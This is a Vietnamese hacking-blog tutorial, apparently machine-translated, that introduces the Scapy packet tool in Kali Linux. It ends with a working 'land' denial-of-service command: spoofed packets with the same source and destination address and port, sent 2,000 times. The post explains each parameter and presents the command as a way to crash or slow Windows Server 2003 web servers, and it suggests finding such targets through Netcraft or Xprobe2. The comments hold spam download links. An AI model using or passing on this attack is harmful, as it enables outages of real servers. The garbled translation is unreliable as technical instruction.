Hướng Dẫn Cài Đặt Và Tấn Công DDOS Bằng Scapy

Hướng Dẫn Cài Đặt Và Tấn Công DDOS Bằng Scapy

Edit

Trong bài viết này, chúng tôi sẽ bổ sung thêm một công cụ mới gọi Scapy cho kho vũ khí của bạn. Scapy là một công cụ thao tác tương tự như gói Nmap và hping, nhưng không giống như những công cụ khác, Scapy là gần như vô hạn tùy biến. Đây không phải là để nói rằng Nmap và Hping là không thể tùy biến, nhưng khả năng của họ để có thể chỉnh hạn chế. Scapy, mặt khác, hầu như không có giới hạn trong khả năng của bạn để tùy chỉnh nó, nhưng nó vẫn có một chút của một đường cong học tập.

Nếu bạn đầu tư thời gian để hiểu Scapy, bạn sẽ được thưởng một vũ khí rất mạnh mẽ.

Understanding TCP/IP

Khi sử dụng một công cụ như Scapy, Nmap, hping, và những người khác, nó là rất quan trọng bạn hiểu được cấu trúc của cả hai tiêu đề IP và TCP header.



Bạn càng hiểu rõ cấu trúc của những tiêu đề và các gói tin, các hacker tốt hơn bạn sẽ có. Nếu không, bạn sẽ bị hạn chế việc là một kiddie kịch bản với một số công cụ mạnh mẽ và không có kiến thức để sử dụng chúng một cách hiệu quả.

Scapy cũng rất linh hoạt. Nó có thể được tùy chỉnh để làm ARP spoofing, ARP cache, packet sniffing và phân tích như Tcpdump và Wireshark, tiêm chích 802.1 khung như aireplay-ng, và VoIP giải mã như Cain và Abel. Nó được viết bằng Python bởi Philipe Biondi và có khả năng crafting gói cũng như các gói giải mã. Cú pháp của nó là một chút mơ hồ, nhưng sức mạnh của nó làm cho nó có giá trị đầu tư thời gian để học.

Trong bài viết này, tôi sẽ cố gắng giới thiệu lần đầu tiên bạn đến cú pháp Scapy và sau đó chúng tôi sẽ sử dụng nó cho một cuộc tấn công DoS đơn giản nhưng hiệu quả.

Step 1 Fire Up Kali & Run Scapy

Treen kali linux
  • kali > scapy

Khi chúng ta làm như vậy, chúng ta sẽ được chào đón với màn hình giống như thế ở trên. Thông báo ">>>" nhắc. Điều này chỉ ra rằng Scapy là trong chế độ tương tác. Tất cả các lệnh sau đây sẽ là lệnh Scapy và sẽ được giải thích bởi các thông dịch viên Scapy.

Step 2View the Scapy Configuration File

bay giờ chúng ta sẽ cấu hình
  • >>> conf

Như bạn có thể thấy trong hình trên, Scapy thấy tập tin cấu hình của nó khi chúng ta gõ "conf". Trong một bài hướng dẫn sau, chúng ta sẽ làm việc với các tập tin cấu hình này trong Scapy, nhưng bây giờ, tôi chỉ muốn bạn biết nơi nó cư trú .

Step 3 Create a Packet

Vẻ đẹp của Scapy là khả năng tùy chỉnh xây dựng bất kỳ gói, bạn có thể tưởng tượng. Nói chung, các ngăn xếp TCP / IP của hệ điều hành của bạn sẽ xây dựng một gói RFC tuân thủ bất cứ khi nào bạn muốn giao tiếp qua Internet. Là một hacker, chúng ta thường muốn tạo ra một tùy chỉnh / gói duy nhất mà có thể không RFC tuân thủ với mục đích thu thập thông tin về mục tiêu của chúng tôi (tức là, quét) hoặc có thể tạo ra một điều kiện DoS bằng cách tạo ra một gói dữ liệu đó gây ra các hệ thống mục tiêu sụp đổ (tấn công mặt đất, ping của cái chết, fragroute, vv).

Vì vậy, chúng ta hãy bắt đầu bằng cách tạo ra một gói tin IP đơn giản. Trong Scapy, đầu tiên bạn khai báo một biến đại diện cho gói của bạn và sau đó xác định các thuộc tính từng người một gói tin. Vì vậy, ở đây chúng tôi xác định gói tin của chúng tôi là "x" và sau đó cung cấp cho x nhiều thuộc tính. Hãy bắt đầu bằng cách định nghĩa "x" như một gói tin IP có TTL 64.
  • >>> x=IP(ttl=64)
  • >>> x

Chú ý rằng sau khi tôi đã tạo ra các biến x và định nghĩa nó như là một gói tin IP với một thời gian sống (TTL) là 64, sau đó tôi retyped biến x và nó phản ứng với các giá trị của x. Trong trường hợp này, thời gian IP để sống = 64.

Bây giờ, chúng ta hãy thêm một số thuộc tính bổ sung để x biến này, chẳng hạn như một địa chỉ IP nguồn và đích. Cú pháp tương tự như Wireshark hay Tcpdump. Chúng tôi đại diện cho các thuộc tính nguồn IP với x.src và IP đích thuộc tính với x.dst tiếp theo giá trị trong dấu ngoặc kép ( ").
  • >>> x.src="192.168.1.101"
  • >>> x.dst="192.168.1.122"

Chú ý rằng sau khi cài đặt mỗi giá trị, tôi đã kiểm tra các giá trị bằng cách đơn giản gõ lại biến tiếp theo thuộc tính.

Bây giờ chúng tôi đã tạo ra một gói tin với các thuộc tính sau:
  • TTL=64
  • Source IP is 192.168.1.101
  • Destination IP is 192.168.1.122
Chúng ta có thể kiểm tra những bây giờ gõ tên biến, x,

Step 4 Built-in Functions

Scapy có số lượng lớn các chức năng được xây dựng trong. Chúng ta có thể liệt kê các chức năng này bằng cách gõ:
  • >>> lsc()

Từ danh sách quá dài để hiển thị trong một màn hình, tôi đã hiển thị đầu tiên của các chức năng trên và cuối cùng của các chức năng dưới đây. Lưu ý, một số chức năng không phù hợp với hai màn hình.

Lưu ý lệnh "gửi" trên dòng đầu tiên của các ảnh chụp màn hình thứ hai của các chức năng. Đây là những gì chúng tôi sử dụng khi chúng ta muốn gửi một gói tin. Hãy sử dụng nó để gửi các gói tin chúng tôi tạo ra ở trên được gọi là "x" có các thuộc tính của TTL = 64, nguồn địa chỉ IP của 192.168.1.101, và một địa chỉ mạng IP đích đến của 192.168.1.122.
  • >>> send(x)

Như bạn có thể thấy, gói tin crafted (gói x) đã được gửi đến địa chỉ IP đích.

Chúng ta có thể sử dụng Scapy để soạn thảo một gói với chỉ là về bất kỳ giá trị trong bất kỳ lĩnh vực tiêu đề tiêu đề IP hoặc TCP, chẳng hạn như kích thước cửa sổ, cờ, lĩnh vực phân mảnh, giá trị ghi nhận, số thứ tự, vv

Step 5 Tạo  Attack

Tôi hy vọng bây giờ rằng bạn nhận được những ý kiến cho rằng Scapy để được sử dụng để thao tác bất kỳ trường nào trong các gói tin TCP / IP. Chúng tôi sẽ chơi với một số các lĩnh vực khác trong một hướng dẫn Scapy tiếp theo.

Bây giờ, chúng ta hãy sử dụng khả năng này để tạo ra một gói tin độc hại và sau đó gửi nó cho một hệ thống mục tiêu. Windows Server 2003 (tin hay không thì chúng ta vẫn còn hàng triệu năm 2003 các máy chủ hiện có; kiểm tra trên  Netcraft hoặc sử dụng Xprobe2 để tìm hệ điều hành phù hợp) là dễ bị tấn công nhất. Đây là một cuộc tấn công DoS mà sẽ gửi một gói tin quá khổ với mục tiêu với cùng một nguồn và địa chỉ IP đích và cùng một nguồn và cổng đích. Nó không phải luôn luôn sụp đổ hệ thống, nhưng sẽ làm chậm nó xuống đáng kể. Đối với các máy chủ web, làm chậm chúng xuống là có hiệu quả một DoS.

Hãy tạo ra rằng gói tin tấn công đất trong Scapy. Scapy có thể đưa tất cả các thuộc tính trong một lệnh duy nhất. Vì vậy, hãy tạo gói tin tấn công của chúng ta và gửi 2.000 lần. Chúng tôi có thể làm điều này bằng cách gõ:
  • >>> send(IP(src="192.168.1.122", dst="192.168.1.122")/TCP(sport=135,dport=135), count=2000)

  • send is the command
  • IP defines the protocol for IP addresses
  • src="192.168.1.122" is the source IP address
  • dst="192.168.1.122" is the destination IP address
  • TCP defines the protocol for the ports
  • sport=135 defines the source port
  • dport=135 defines the destination port
  • count=2000 defines the number of packets we want to send

Nếu những thông tin này đều hướng tới một Windows Server 2003, nó có thể sụp đổ hệ thống hoặc ít nhất là làm chậm nó xuống đáng kể. Khi một máy chủ web là làm chậm lại, nó có hiệu quả liều website.

Scapy là có khác là quét mạnh mẽ và là công cụ trong kho vũ khí của chúng ta về các công cụ. Scapy là vô cùng linh hoạt cho phép chúng ta làm nhiều nhiệm vụ với các công cụ duy nhất này. Nó có hầu như một khả năng không giới hạn để tạo ra các gói tin với bất kỳ đặc điểm bạn có thể tưởng tượng và do đó tạo ra một kỹ thuật quét độc đáo và các cuộc tấn công DoS.
Share on Google Plus

About Vo Uu

Tác Giả là người chuyên nghiên cứu về các kỹ thuật hacking, security, marketing, là người có góc nhìn lạ và đi sâu vấn đề cũng như là một con người thẳng thắn góp ý. Nếu sử dụng bài trên blog mong các bạn dẫn lại nguồn tác giả!!! Tác Giả rất mong có sự đóng góp hội ý từ cộng đồng để cho an toàn an ninh mạng việt nam ngày càng được an toàn hơn!!

1 nhận xét:

  1. Anonymous13 March 2022 at 01:35

    Hướng Dẫn Cài Đặt Và Tấn Công Ddos Bằng Scapy - Blog Vô Ưu Hacking And Security >>>>> Download Now

    >>>>> Download Full

    Hướng Dẫn Cài Đặt Và Tấn Công Ddos Bằng Scapy - Blog Vô Ưu Hacking And Security >>>>> Download LINK

    >>>>> Download Now

    Hướng Dẫn Cài Đặt Và Tấn Công Ddos Bằng Scapy - Blog Vô Ưu Hacking And Security >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete

Subscribe to: Post Comments ( Atom )